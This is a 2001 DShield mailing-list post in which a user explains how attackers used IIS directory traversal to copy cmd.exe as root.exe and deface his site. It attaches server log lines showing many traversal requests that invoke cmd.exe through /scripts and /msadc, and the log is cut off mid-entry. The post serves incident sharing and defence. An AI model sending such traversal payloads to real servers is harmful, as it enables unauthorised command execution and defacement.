[Dshield] RE: Check this out

shilor shilor at optonline.net
Tue Aug 21 17:29:03 GMT 2001


A few months ago somebody compromised my computer using exactly the same
program (before RC time).
1. The program tries to find a vulnerable IIS folder, usually
inetpub/wwwroot/scripts or ////msadc.
2. If found, it copies or renames cmd.exe to this folder with the name
root.exe (or using cmd.exe to add root.exe, I am not sure).
3. Later, the attacker uses root.exe to act on your computer. In my case
he installed anti-American HTML pages on my IIS virtual directories with
the names: index.htm, default.htm, etc.
4. Since my default page was default.htm, this anti-American page
appeared on my site (instead of my resume). Root.exe is very powerful
and can also delete files.

You should scan your computer for root.exe files. If found, correct your
internet access privileges setup and then just delete these programs.
The offender will probably continue attacking your machine for some
time, as it happened to me.

Regards,
Zeev Shilor, SPM

--------------------------------------------------------------------
2001-07-24 20:16:42 61.151.255.114 - GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 70 -
2001-07-24 20:16:42 61.151.255.114 - GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-07-24 20:16:43 61.151.255.114 - GET /scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:43 61.151.255.114 - GET /scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET /scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:44 61.151.255.114 - GET /scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET /scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-07-24 20:16:45 61.151.255.114 - GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-07-24 20:16:46 61.151.255.114 - GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-07-24 20:16:48 61.151.255.114 - GET /scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-07-24 20:16:48 61.151.255.114 - GET /scripts/..°ÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 75 0 -
2001-07-24 20:16:49 61.151.255.114 - GET /scripts/..nÇÇÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 78 10 -
2001-07-24 20:16:49 61.151.255.114 - GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 502 374 95 20 -
2001-08-10 12:13:40 61.182.207.228 - GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 374 66 90 -
2001-08-10 12:13:41 61.182.207.228 - GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:13:43 61.182.207.228 - GET /scripts/..-%pc../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:54 61.182.207.228 - GET /scripts/..+%9v../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:13:56 61.182.207.228 - GET /scripts/..+%qf../winnt/system32/cmd.exe /c+dir 500 0 66 10 -
2001-08-10 12:14:00 61.182.207.228 - GET /scripts/..-%8s../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:02 61.182.207.228 - GET /scripts/..-?../winnt/system32/cmd.exe /c+dir 500 0 66 0 -
2001-08-10 12:14:04 61.182.207.228 - GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 374 66 10 -
2001-08-10 12:14:06 61.182.207.228 - GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 3387 66 0 -
2001-08-10 12:14:11 61.182.207.228 - GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 374 69 10 -
2001-08-10 12:14:16 61.182.207.228 - GET /scripts/..=ÇÇ»../winnt/system32/cmd.exe /c+dir 404 3387 72 20 -
2001-08-10 12:14:24 61.182.207.228 - GET